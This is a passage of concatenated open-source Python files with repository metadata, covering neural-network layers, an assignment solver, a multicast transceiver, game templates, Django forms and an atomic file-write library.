    def opt_vars(self):
        out = []
        for layer in self.layers:
            out.extend(layer.opt_vars())
        return out
    def extra_vars(self):
        return []
class LayerChain(ParameterizedFunc):
    """
    Composition of ParameterizedFuncs applied in sequence; the chain has
    one input and one output.
    """
    def __init__(self, layers):
        self.layers = layers
    def __call__(self, X):
        out = X
        for func in self.layers:
            out = func(out)
        return out
    def opt_vars(self):
        return concatenate(func.opt_vars() for func in self.layers)
    def extra_vars(self):
        return concatenate(func.extra_vars() for func in self.layers)
class NetworkFromFunc(ParameterizedFunc):
    """
    Wrap several smaller ParameterizedFuncs into one: the callable ``f``
    passed to the constructor defines the computation, while ``layers``
    supplies the parameter variables.
    """
    def __init__(self, layers, f):
        self.layers = layers
        self.f = f
    def __call__(self, *inputs):
        return self.f(*inputs)
    def opt_vars(self):
        return concatenate(component.opt_vars() for component in self.layers)
    def extra_vars(self):
        return concatenate(component.extra_vars() for component in self.layers)
def randn_init(*shape):
    """
    Sample a standard-normal array of the given shape, rescale every column
    to unit Euclidean norm, and return it with dtype floatX.
    """
    w = np.random.randn(*shape)
    col_norms = np.sqrt((w ** 2).sum(axis=0))
    w = (w / col_norms).astype(floatX)
    return w
| {
"content_hash": "474dcf70e213b1682050de9514af0cb2",
"timestamp": "",
"source": "github",
"line_count": 185,
"max_line_length": 143,
"avg_line_length": 32.486486486486484,
"alnum_prop": 0.6232945091514143,
"repo_name": "SFPD/rlreloaded",
"id": "295e4f8d8e8b803869b8e9be3463fc84b70e8bc4",
"size": "6010",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "control4/nn/nn.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "753"
},
{
"name": "C++",
"bytes": "88527"
},
{
"name": "CMake",
"bytes": "33134"
},
{
"name": "Python",
"bytes": "478983"
},
{
"name": "Shell",
"bytes": "953"
}
],
"symlink_target": ""
} |
'''Hybrid assignment solver. Quickly finds a candidate solution and
then improves on it iteratively through branch-and-bound search.
'''
import uuid
import random
import logging
import numpy as np
import model
from solvers import Solver
from assignments.cached import CachedAssignment
class Node(object):
    '''Branch and bound search node.

    Bundles a (possibly partial) assignment with the bookkeeping the search
    needs: the next assignment-matrix row to branch on and the number of
    symbols still to assign per partition.
    '''
    def __init__(self, parameters, assignment, row, partition_count):
        '''Create a branch-and-bound node. One node is created for each
        branch that is searched.

        Args:

        parameters: Parameters object.

        assignment: Assignment object.

        row: The row of the assignment matrix to consider next.

        partition_count: Vector of length num_partitions with symbol
        counts by partition.
        '''
        assert isinstance(parameters, model.SystemParameters)
        assert isinstance(assignment, CachedAssignment)
        assert isinstance(row, int) and 0 <= row < parameters.num_batches
        assert isinstance(partition_count, list)
        self.parameters = parameters
        self.assignment = assignment
        self.complete = False
        # Advance past batches whose rows are already fully assigned.
        current = row
        while (current < parameters.num_batches and
               assignment.batch_union({current}).sum() == parameters.rows_per_batch):
            current += 1
        if current == parameters.num_batches:
            # Every batch is full: nothing left to branch on.
            self.complete = True
            self.row = None
        else:
            self.row = current
        self.partition_count = partition_count
        return
    def __str__(self):
        description = 'Row: {} Complete: {} Score: {}'
        return description.format(self.row, self.complete, self.assignment.score)
class HybridSolver(Solver):
    '''Hybrid assignment solver. Quickly finds a candidate solution and
    then improves on it iteratively through branch-and-bound search.
    '''
    def __init__(self, initialsolver=None, directory=None, clear=3):
        '''Create a hybrid solver.

        Args:

        initialsolver: The solver used to find the initial assignment.
        Required despite the None default, which exists only for
        keyword-style construction.

        directory: Store intermediate assignments in this directory.
        Set to None to not store intermediate assignments.

        clear: Number of elements of the assignment matrix to
        re-assign per iteration.
        '''
        assert initialsolver is not None
        assert isinstance(directory, str) or directory is None
        self.initialsolver = initialsolver
        self.directory = directory
        self.clear = clear
        return
    def branch_and_bound(self, parameters, assignment, partition_count, best_assignment):
        '''Assign any remaining elements optimally via depth-first
        branch-and-bound, returning the best complete assignment found
        (which is best_assignment itself if nothing better exists).'''
        stack = list()
        stack.append(Node(parameters, assignment, 0, partition_count))
        completed = 0
        pruned = 0
        # NOTE: counters are kept for debugging; only improvements are logged.
        while stack:
            node = stack.pop()
            # Keep completed assignments that match or beat the incumbent.
            if node.complete and node.assignment.score <= best_assignment.score:
                logging.debug('Completed assignment with improvement %d.',
                              best_assignment.score - node.assignment.score)
                best_assignment = node.assignment
                completed += 1
            for partition in range(parameters.num_partitions):
                if not node.partition_count[partition]:
                    continue
                assignment = node.assignment.increment([node.row], [partition], [1])
                # Prune branches whose lower bound cannot beat the incumbent.
                if assignment.bound() >= best_assignment.score:
                    pruned += 1
                    continue
                partition_count = node.partition_count[:]
                partition_count[partition] -= 1
                stack.append(Node(parameters, assignment, node.row, partition_count))
        return best_assignment
    def deassign(self, parameters, assignment, partition_count, deassignments):
        '''De-assign elements randomly.

        Args:

        parameters: Parameters object.

        assignment: Assignment object.

        partition_count: Vector of length num_partitions with symbol
        counts by partition; incremented in place for each de-assignment.

        deassignments: Number of deassignments to make.

        Returns: The updated assignment.
        '''
        assert isinstance(deassignments, int) and deassignments > 0
        # Cache the row and col indices to decrement.
        indices = dict()
        # Select row, col pairs.
        while deassignments > 0:
            row = random.randint(0, parameters.num_batches - 1)
            col = random.randint(0, parameters.num_partitions - 1)
            # Ensure that there are remaining values to decrement.
            remaining = assignment.assignment_matrix[row, col] - 1
            remaining -= indices.get((row, col), 0)
            if remaining < 0:
                continue
            # Record the de-assignment.
            deassignments -= 1
            partition_count[col] += 1
            indices[(row, col)] = indices.get((row, col), 0) + 1
        # Apply all decrements in a single call.
        keys = list(indices.keys())
        values = [indices[key] for key in keys]
        rows = [index[0] for index in keys]
        cols = [index[1] for index in keys]
        return assignment.decrement(rows, cols, values)
    def solve(self, parameters, assignment_type=None):
        '''Find an assignment using this solver.

        Args:

        parameters: System parameters

        Returns: The resulting assignment
        '''
        assert isinstance(parameters, model.SystemParameters)
        assert assignment_type is None or assignment_type is CachedAssignment, \
            'Solver must be used with CachedAssignment.'
        # Load solution or find one using the initial solver.
        try:
            assignment = CachedAssignment.load(parameters, directory=self.directory)
            logging.debug('Loaded a candidate solution from disk.')
        except FileNotFoundError:
            logging.debug('Finding a candidate solution using solver %s.', self.initialsolver.identifier)
            assignment = self.initialsolver.solve(parameters, assignment_type=CachedAssignment)
            if self.directory:
                assignment.save(directory=self.directory)
        # Ensure there is room for optimization.
        counts = np.zeros(parameters.num_partitions)
        for row in assignment.rows_iterator():
            counts += row
        if counts.sum() < self.clear:
            logging.debug('Initial solution leaves no room for optimization. Returning.')
            return assignment
        # Make sure the dynamic programming index is built
        if not assignment.index or not assignment.score:
            assignment = CachedAssignment(parameters, gamma=assignment.gamma,
                                          assignment_matrix=assignment.assignment_matrix,
                                          labels=assignment.labels)
        # Guard against division by zero when reporting relative improvement.
        original_score = max(assignment.score, 1)
        best_assignment = assignment.copy()
        # Iteratively improve the assignment until the exponentially-weighted
        # moving average of per-iteration improvement drops below threshold.
        iterations = 0
        total_improvement = 0
        moving_average = 1
        stop_threshold = 0.0001
        while moving_average > stop_threshold:
            # Count symbols by partition
            partition_count = [0] * parameters.num_partitions
            # De-assign elements
            decremented_assignment = self.deassign(parameters, best_assignment,
                                                   partition_count, self.clear)
            # Re-assign optimally
            improved_assignment = self.branch_and_bound(parameters, decremented_assignment,
                                                        partition_count, best_assignment)
            iterations += 1
            improvement = (best_assignment.score - improved_assignment.score) / original_score
            total_improvement += improvement
            moving_average *= 0.9
            moving_average += improvement
            best_assignment = improved_assignment.copy()
            logging.info('Improved %f%% over %d iterations. Moving average: %f%%. Stop threshold: %f%%.',
                         total_improvement * 100, iterations, moving_average * 100, stop_threshold * 100)
            if self.directory and improvement > 0:
                best_assignment.save(directory=self.directory)
        return best_assignment
    @property
    def identifier(self):
        '''Return a string identifier for this object.'''
        return self.__class__.__name__
| {
"content_hash": "b6ab7ab793899765005b811e25405b6e",
"timestamp": "",
"source": "github",
"line_count": 253,
"max_line_length": 105,
"avg_line_length": 36.29644268774704,
"alnum_prop": 0.6059022106065556,
"repo_name": "severinson/Coded-Shuffling",
"id": "6f784acafed0fbc767c26a2fecee211d8952c5a6",
"size": "10339",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "solvers/hybrid.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "63"
},
{
"name": "Python",
"bytes": "235188"
}
],
"symlink_target": ""
} |
"""\
============================
Simple multicast transceiver
============================
A simple component for transmitting and receiving multicast packets.
Remember that multicast is an unreliable connection - packets may be lost,
duplicated or reordered.
Example Usage
-------------
Send a file to, and receive data from multicast group address 1.2.3.4 port 1000::
Pipeline( RateControlledFileReader("myfile", rate=100000),
Multicast_transceiver("0.0.0.0", 0, "1.2.3.4", 1000),
).activate()
Pipeline( Multicast_transceiver("0.0.0.0", 1000, "1.2.3.4", 0),
ConsoleEchoer()
).activate()
Or::
Pipeline( RateControlledFileReader("myfile", rate=100000),
Multicast_transceiver("0.0.0.0", 1000, "1.2.3.4", 1000),
ConsoleEchoer()
).activate()
The data emitted by Multicast_transciever (and displayed by ConsoleEchoer) is of
the form (source_address, data).
More detail
-----------
Data sent to the component's "inbox" inbox is sent to the multicast group.
Data received from the multicast group is emitted as a tuple:
(source_addr, data) where data is a string of the received data.
This component ignores anything received on its "control" inbox. It is not yet
possible to ask it to shut down. It does not terminate.
Multicast groups do not 'shut down', so this component never emits any signals
on its "signal" outbox.
Why a transceiver component?
----------------------------
Listens for packets in the given multicast group. Any data received is
sent to the receiver's outbox. The logic here is likely to be not quite
ideal. When complete though, this will be preferable over the sender and
receiver components since it models what multicast really is rather than
what people tend to think it is.
"""
import socket
import Axon
class Multicast_transceiver(Axon.Component.component):
    """\
    Multicast_transceiver(local_addr, local_port, remote_addr, remote_port) -> component that sends and receives data to/from a multicast group.

    Creates a component that sends data received on its "inbox" inbox to the
    specified multicast group; and sends to its "outbox" outbox tuples of the
    form (src_addr, data) containing data received.

    Keyword arguments:

    - local_addr  -- local address (interface) to bind/receive on (string)
    - local_port  -- local port number to bind/receive on
    - remote_addr -- address of multicast group to join and send to (string)
    - remote_port -- port number to send to
    """
    Inboxes = { "inbox"   : "Data to be sent to the multicast group",
                "control" : "NOT USED",
              }
    Outboxes = { "outbox" : "Emits (src_addr, data_received)",
                 "signal" : "NOT USED",
               }

    def __init__(self, local_addr, local_port, remote_addr, remote_port, debug=False):
        """x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
        super(Multicast_transceiver, self).__init__()
        self.local_addr = local_addr    # Multicast address we join
        self.local_port = local_port    # and port
        self.remote_addr = remote_addr  # Multicast address we send to (may be same)
        self.remote_port = remote_port  # and port.
        self.debug = debug              # when true, dumps the raw inbox contents on each send

    def main(self):
        """Main loop: a generator that the Axon scheduler resumes at each ``yield``."""
        # One UDP socket serves both directions (hence "transceiver").
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        # Allow other processes/components to bind the same port.
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind((self.local_addr,self.local_port)) # Receive from server on this port
        # TTL 255: let outgoing multicast packets cross routers.
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
        # Join the multicast group on the default interface ("0.0.0.0").
        # NOTE(review): setsockopt returns None, so `status` is always None.
        status = sock.setsockopt(socket.IPPROTO_IP,
                                 socket.IP_ADD_MEMBERSHIP,
                                 socket.inet_aton(self.remote_addr) + socket.inet_aton("0.0.0.0"))
        # Non-blocking: recvfrom/sendto raise socket.error instead of stalling
        # the cooperative scheduler.
        sock.setblocking(0)

        # This buffer collects data to be sent
        tosend = []
        while 1:
            try:
                data, addr = sock.recvfrom(16384)
            except socket.error, e:
                # Nothing waiting to be received this cycle -- not an error.
                pass
            else:
                message = (addr, data)
                self.send(message,"outbox")
            # Hand control back to the scheduler once per receive/send cycle.
            yield 1
            # Drain our inbox into the outgoing buffer.
            while self.dataReady("inbox"):
                data = self.recv()
                tosend.append(data)
                if self.debug:
                    print self.inboxes["inbox"]
            # Try to flush the buffer; packets stay queued if the send fails.
            while len(tosend)>0:
                try:
                    l = sock.sendto(tosend[0], (self.remote_addr,self.remote_port) );
                    del tosend[0]
                except socket.error, e:
                    # break out the loop, since we can't send right now
                    break
def tests():
    """Point the reader at the system-level acceptance test for this module."""
    # No self-contained unit test exists; the component needs a live scheduler
    # and network, so it is exercised end-to-end instead.
    print "This module is acceptance tested as part of a system."
    print "Please see the test/test_MulticastTransceiverSystem.py script instead"
# Components this module publishes (consumed by Kamaelia's component registry).
__kamaelia_components__ = ( Multicast_transceiver, )

if __name__=="__main__":
    tests()
| {
"content_hash": "aa49c66fd40fd0532d221f1d65deb48f",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 142,
"avg_line_length": 33.12162162162162,
"alnum_prop": 0.6128110975112199,
"repo_name": "bbc/kamaelia",
"id": "12cfeca9ca1ea0414f1ae5f5f05fd3de37aa4b4a",
"size": "5803",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Internet/Multicast_transceiver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ApacheConf",
"bytes": "62985"
},
{
"name": "C",
"bytes": "212854"
},
{
"name": "C++",
"bytes": "327546"
},
{
"name": "CSS",
"bytes": "114434"
},
{
"name": "ChucK",
"bytes": "422"
},
{
"name": "Diff",
"bytes": "483"
},
{
"name": "Gettext Catalog",
"bytes": "3919909"
},
{
"name": "HTML",
"bytes": "1288960"
},
{
"name": "Java",
"bytes": "31832"
},
{
"name": "JavaScript",
"bytes": "829491"
},
{
"name": "Makefile",
"bytes": "5768"
},
{
"name": "NSIS",
"bytes": "18867"
},
{
"name": "PHP",
"bytes": "49059"
},
{
"name": "Perl",
"bytes": "31234"
},
{
"name": "Processing",
"bytes": "2885"
},
{
"name": "Pure Data",
"bytes": "7485482"
},
{
"name": "Python",
"bytes": "18896320"
},
{
"name": "Ruby",
"bytes": "4165"
},
{
"name": "Shell",
"bytes": "711244"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
    """Build and return the shared 'Angerian fishak surprise' drink Tangible.

    :param kernel: SWGANH kernel handle -- part of the template-factory API;
        unused by this particular template.
    """
    result = Tangible()
    # IFF template and STF name pair identify this object to the client.
    result.template = "object/tangible/food/crafted/shared_drink_angerian_fishak_surprise.iff"
    result.attribute_template_id = 5
    result.stfName("food_name","angerian_fishak_surprise")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####
return result | {
"content_hash": "ab25956a995d6ea96140c2e9e0ec1d64",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 91,
"avg_line_length": 25.76923076923077,
"alnum_prop": 0.7164179104477612,
"repo_name": "anhstudios/swganh",
"id": "0f282a0e76888845cefb665e2fc3b4c4cfa599e7",
"size": "480",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "data/scripts/templates/object/tangible/food/crafted/shared_drink_angerian_fishak_surprise.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11887"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2357839"
},
{
"name": "CMake",
"bytes": "41264"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7503510"
},
{
"name": "SQLPL",
"bytes": "42770"
}
],
"symlink_target": ""
} |
from pyccel.decorators import types
# NOTE: this decorator deliberately declares ONE type for TWO parameters.
# The file is a negative test fixture for pyccel's
# DECORATOR_WRONG_NUMBER_TYPES semantic error -- do not "fix" the mismatch.
@types('int')
def func(n,m):
    return n + m
| {
"content_hash": "5f76fdae17c498dff79326ceb47547e8",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 35,
"avg_line_length": 14,
"alnum_prop": 0.6666666666666666,
"repo_name": "ratnania/pyccel",
"id": "285f80ab8439587f5b95096cad4bdf37e73dbe43",
"size": "156",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/errors/semantic/blocking/DECORATOR_WRONG_NUMBER_TYPES.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CMake",
"bytes": "111665"
},
{
"name": "Python",
"bytes": "863199"
},
{
"name": "Shell",
"bytes": "712"
}
],
"symlink_target": ""
} |
from django.conf.urls.defaults import *
# URL patterns to be merged into the project's root URLconf:
# mounts django-registration's account views under /account/.
rootpatterns = patterns('',
    (r'^account/', include('registration.urls')),
)
| {
"content_hash": "a2846656530eec8e05d8bc59f9ed67ee",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 24.2,
"alnum_prop": 0.6859504132231405,
"repo_name": "stonezdj/forzdj",
"id": "38cb6c446e8e10797f13b027e013c3e635f32e50",
"size": "121",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "registration/urlsauto.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "21230"
},
{
"name": "JavaScript",
"bytes": "12164"
},
{
"name": "Python",
"bytes": "246618"
}
],
"symlink_target": ""
} |
"""This module contains Melange cron jobs."""
| {
"content_hash": "8b11845f5b43d419c37ae97bf9b9b03d",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 45,
"avg_line_length": 46,
"alnum_prop": 0.717391304347826,
"repo_name": "jamslevy/gsoc",
"id": "e10dbbd7e2573809a0f7e944f66f488aa317b889",
"size": "631",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "app/soc/cron/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "400472"
},
{
"name": "JavaScript",
"bytes": "388268"
},
{
"name": "Perl",
"bytes": "66733"
},
{
"name": "Python",
"bytes": "8290513"
},
{
"name": "Shell",
"bytes": "5570"
}
],
"symlink_target": ""
} |
import os
from subliminal import download_best_subtitles, save_subtitles
from subliminal.video import Episode
from subliminal.core import search_external_subtitles
from babelfish.language import Language
class FileSubtitler:
    def __init__(self, languages, providers):
        # languages: IETF language tags (e.g. "en") -- converted with
        #   Language.fromietf() when subtitling.
        # providers: subliminal provider names passed to
        #   download_best_subtitles().
        self.languages = languages
        self.providers = providers
def subtitle(self, episodes):
# Parse babelfish languages
bb_lang = {Language.fromietf(l) for l in self.languages}
# Create subliminal episode set
sub_episodes = set()
for episode in episodes:
ep_path = os.path.join(episode['dir'], episode['filename'])
sub_episode = Episode.fromguess(ep_path, episode)
# Look for external subtitles (not done automatically, apparently)
sub_episode.subtitle_languages |= set(search_external_subtitles(sub_episode.name).values())
sub_episodes.add(sub_episode)
# download subtitles in the specified language
subl_subtitles = download_best_subtitles(sub_episodes, bb_lang, providers=self.providers)
for video, subtitles in subl_subtitles.items():
save_subtitles(video, subtitles)
# save subtitle languages in episode dict | {
"content_hash": "b0feeb7692988632834739df3bb73ff0",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 103,
"avg_line_length": 31.475,
"alnum_prop": 0.6799046862589356,
"repo_name": "rkohser/gustaf2",
"id": "44b5582ca5c8f5bb8a0d6cb78e64a53a92249c9c",
"size": "1259",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "back/fs/filesubtitler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "467"
},
{
"name": "CSS",
"bytes": "179"
},
{
"name": "HTML",
"bytes": "3255"
},
{
"name": "JavaScript",
"bytes": "1645"
},
{
"name": "Python",
"bytes": "9151"
},
{
"name": "TypeScript",
"bytes": "12672"
}
],
"symlink_target": ""
} |
from django import forms
from django.utils.translation import ugettext as _
from search.models import Collection
from search_controller import SearchController
class QueryForm(forms.Form):
    """Search form: a visible query box plus hidden Solr parameters.

    The ``collection`` choices are loaded from the database at instantiation
    time (not at class definition time), so ``__init__`` rebuilds the field.
    Callers must pass an ``initial_collection`` keyword argument.
    """
    collection = forms.ChoiceField() # Aka collection_id
    query = forms.CharField(label='', max_length=256, required=False, initial='',
                            widget=forms.TextInput(attrs={'class': 'search-query input-xxlarge', 'placeholder': 'Search...'}))
    # The remaining fields mirror Solr request parameters and are driven by JS.
    fq = forms.CharField(label='', max_length=256, required=False, initial='', widget=forms.HiddenInput(), help_text='Solr Filter query')
    sort = forms.CharField(label='', max_length=256, required=False, initial='', widget=forms.HiddenInput(), help_text='Solr sort')
    rows = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Solr records per page')
    start = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Solr start record')
    facets = forms.CharField(label='', required=False, initial='', widget=forms.HiddenInput(), help_text='Show hide facet search')

    def __init__(self, *args, **kwargs):
        self.initial_collection = kwargs.pop('initial_collection')
        super(QueryForm, self).__init__(*args, **kwargs)
        # Only enabled collections are offered as choices.
        choices = [(core.id, core.label) for core in Collection.objects.filter(enabled=True)]
        # Beware: initial not working, set in the js
        self.fields['collection'] = forms.ChoiceField(choices=choices, initial=self.initial_collection, required=False, label='', widget=forms.Select(attrs={'class':'hide'}))

    def clean_collection(self):
        # Fall back to the caller-supplied default when nothing was submitted.
        if self.cleaned_data.get('collection'):
            return self.cleaned_data['collection']
        else:
            return self.initial_collection
class HighlightingForm(forms.Form):
    """Toggle search-result highlighting and pick which fields to highlight.

    The available field names are supplied by the caller via the ``fields``
    keyword argument and become the choices of the multiple-choice field.
    """
    fields = forms.MultipleChoiceField(required=False)
    is_enabled = forms.BooleanField(label='Enabled', initial=True, required=False)

    def __init__(self, *args, **kwargs):
        field_names = kwargs.pop('fields')
        super(HighlightingForm, self).__init__(*args, **kwargs)
        # Each caller-supplied name is both the stored value and the label.
        self.fields['fields'].choices = ((name, name) for name in field_names)
class CollectionForm(forms.ModelForm):
    """ModelForm for Collection; the name must match a live Solr collection/core."""
    class Meta:
        model = Collection
        # These fields are managed programmatically, not through this form.
        exclude = ('facets', 'result', 'sorting', 'properties', 'cores')

    def clean_name(self):
        """Reject names that no live Solr collection or core answers to."""
        searcher = SearchController()
        name = self.cleaned_data['name']
        if not searcher.is_collection(name) and not searcher.is_core(name):
            raise forms.ValidationError(_('No live Solr collection or core by the name %s') % name)
return name | {
"content_hash": "9d05c0bd2abfabb19207ff3172d24c04",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 170,
"avg_line_length": 47.735849056603776,
"alnum_prop": 0.7043478260869566,
"repo_name": "2013Commons/HUE-SHARK",
"id": "31593397b83ed5d53ac162a5b30d069e2fbc6ddb",
"size": "3323",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/search/src/search/forms.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "9992379"
},
{
"name": "C++",
"bytes": "199612"
},
{
"name": "CSS",
"bytes": "419753"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3683071"
},
{
"name": "JavaScript",
"bytes": "1076553"
},
{
"name": "Perl",
"bytes": "138710"
},
{
"name": "Python",
"bytes": "40522057"
},
{
"name": "SQL",
"bytes": "522"
},
{
"name": "Shell",
"bytes": "27739"
},
{
"name": "TeX",
"bytes": "126420"
},
{
"name": "XSLT",
"bytes": "190688"
}
],
"symlink_target": ""
} |
import contextlib
import io
import os
import sys
import tempfile
try:
import fcntl
except ImportError:
fcntl = None
# `fspath` was added in Python 3.6
try:
from os import fspath
except ImportError:
fspath = None
__version__ = '1.4.0'

# True when running under Python 2; selects the text type and default mode.
PY2 = sys.version_info[0] == 2

text_type = unicode if PY2 else str  # noqa

def _path_to_unicode(x):
    """Return *x* as text, decoding bytes with the filesystem encoding."""
    if isinstance(x, text_type):
        return x
    return x.decode(sys.getfilesystemencoding())

# Default temp-file mode: binary on Python 2, text on Python 3.
DEFAULT_MODE = "wb" if PY2 else "w"
# Default fsync; replaced below on platforms that need a stronger flush.
_proper_fsync = os.fsync


if sys.platform != 'win32':
    if hasattr(fcntl, 'F_FULLFSYNC'):
        def _proper_fsync(fd):
            # On macOS plain fsync() does not force the write to the platter;
            # F_FULLFSYNC does.
            # https://lists.apple.com/archives/darwin-dev/2005/Feb/msg00072.html
            # https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man2/fsync.2.html
            # https://github.com/untitaker/python-atomicwrites/issues/6
            fcntl.fcntl(fd, fcntl.F_FULLFSYNC)

    def _sync_directory(directory):
        # Ensure that filenames are written to disk
        # (fsync on the file alone does not persist the directory entry).
        fd = os.open(directory, 0)
        try:
            _proper_fsync(fd)
        finally:
            os.close(fd)

    def _replace_atomic(src, dst):
        # POSIX rename() atomically replaces dst; then persist the dir entry.
        os.rename(src, dst)
        _sync_directory(os.path.normpath(os.path.dirname(dst)))

    def _move_atomic(src, dst):
        # link() fails if dst exists, giving no-overwrite semantics; the
        # source link is removed afterwards.
        os.link(src, dst)
        os.unlink(src)

        src_dir = os.path.normpath(os.path.dirname(src))
        dst_dir = os.path.normpath(os.path.dirname(dst))
        _sync_directory(dst_dir)
        if src_dir != dst_dir:
            _sync_directory(src_dir)
else:
    from ctypes import windll, WinError

    _MOVEFILE_REPLACE_EXISTING = 0x1
    _MOVEFILE_WRITE_THROUGH = 0x8
    # WRITE_THROUGH: MoveFileExW does not return until the move is flushed.
    _windows_default_flags = _MOVEFILE_WRITE_THROUGH

    def _handle_errors(rv):
        # Win32 API returns zero/NULL on failure; surface it as an OSError.
        if not rv:
            raise WinError()

    def _replace_atomic(src, dst):
        _handle_errors(windll.kernel32.MoveFileExW(
            _path_to_unicode(src), _path_to_unicode(dst),
            _windows_default_flags | _MOVEFILE_REPLACE_EXISTING
        ))

    def _move_atomic(src, dst):
        # Without REPLACE_EXISTING the call fails if dst already exists.
        _handle_errors(windll.kernel32.MoveFileExW(
            _path_to_unicode(src), _path_to_unicode(dst),
            _windows_default_flags
        ))
def replace_atomic(src, dst):
    '''
    Atomically move ``src`` to ``dst``, silently overwriting ``dst`` if it
    already exists.

    The operation is only atomic when both paths reside on the same
    filesystem.
    '''
    return _replace_atomic(src, dst)
def move_atomic(src, dst):
    '''
    Atomically move ``src`` to ``dst``, raising :py:exc:`FileExistsError` if
    ``dst`` already exists. There may be a window during which both
    filesystem entries exist.

    The operation is only atomic when both paths reside on the same
    filesystem.
    '''
    return _move_atomic(src, dst)
class AtomicWriter(object):
    '''
    A helper class for performing atomic writes. Usage::

        with AtomicWriter(path).open() as f:
            f.write(...)

    The data is written to a temporary file in the destination directory and
    only renamed into place after it has been flushed and fsynced, so readers
    never observe a partially written ``path``.

    :param path: The destination filepath. May or may not exist.
    :param mode: The filemode for the temporary file. This defaults to `wb` in
        Python 2 and `w` in Python 3.
    :param overwrite: If set to false, an error is raised if ``path`` exists.
        Errors are only raised after the file has been written to. Either way,
        the operation is atomic.
    :param open_kwargs: Keyword-arguments to pass to the underlying
        :py:func:`open` call. This can be used to set the encoding when opening
        files in text-mode.

    If you need further control over the exact behavior, you are encouraged to
    subclass.
    '''

    def __init__(self, path, mode=DEFAULT_MODE, overwrite=False,
                 **open_kwargs):
        # Append mode is rejected up front: it cannot be made atomic without
        # first copying the existing file into the temporary one.
        if 'a' in mode:
            raise ValueError(
                'Appending to an existing file is not supported, because that '
                'would involve an expensive `copy`-operation to a temporary '
                'file. Open the file in normal `w`-mode and copy explicitly '
                'if that\'s what you\'re after.'
            )
        if 'x' in mode:
            raise ValueError('Use the `overwrite`-parameter instead.')
        if 'w' not in mode:
            raise ValueError('AtomicWriters can only be written to.')

        # Attempt to convert `path` to `str` or `bytes`
        # (fspath is None on Pythons that predate os.fspath).
        if fspath is not None:
            path = fspath(path)

        self._path = path
        self._mode = mode
        self._overwrite = overwrite
        self._open_kwargs = open_kwargs

    def open(self):
        '''
        Open the temporary file.
        '''
        return self._open(self.get_fileobject)

    @contextlib.contextmanager
    def _open(self, get_fileobject):
        f = None  # make sure f exists even if get_fileobject() fails
        try:
            success = False
            with get_fileobject(**self._open_kwargs) as f:
                # Caller writes to the temp file here; sync happens while it
                # is still open, commit only after the `with` has closed it.
                yield f
                self.sync(f)
            self.commit(f)
            success = True
        finally:
            if not success:
                # Best-effort cleanup of the temp file; the original
                # exception (if any) propagates unchanged.
                try:
                    self.rollback(f)
                except Exception:
                    pass

    def get_fileobject(self, suffix="", prefix=tempfile.gettempprefix(),
                       dir=None, **kwargs):
        '''Return the temporary file to use.'''
        # Default to the destination's directory so the final rename stays on
        # the same filesystem (a requirement for atomicity).
        if dir is None:
            dir = os.path.normpath(os.path.dirname(self._path))
        descriptor, name = tempfile.mkstemp(suffix=suffix, prefix=prefix,
                                            dir=dir)
        # io.open() will take either the descriptor or the name, but we need
        # the name later for commit()/replace_atomic() and couldn't find a way
        # to get the filename from the descriptor.
        os.close(descriptor)
        kwargs['mode'] = self._mode
        kwargs['file'] = name
        return io.open(**kwargs)

    def sync(self, f):
        '''responsible for clearing as many file caches as possible before
        commit'''
        f.flush()
        _proper_fsync(f.fileno())

    def commit(self, f):
        '''Move the temporary file to the target location.'''
        if self._overwrite:
            replace_atomic(f.name, self._path)
        else:
            move_atomic(f.name, self._path)

    def rollback(self, f):
        '''Clean up all temporary resources.'''
        os.unlink(f.name)
def atomic_write(path, writer_cls=AtomicWriter, **cls_kwargs):
    '''
    Convenience wrapper around :py:class:`AtomicWriter`::

        with atomic_write(path) as f:
            f.write(...)

    :param path: The target path to write to.
    :param writer_cls: The writer class to instantiate. Pass a subclass of
        :py:class:`AtomicWriter` here to customise behavior.

    Any additional keyword arguments are forwarded to ``writer_cls``. See
    :py:class:`AtomicWriter`.
    '''
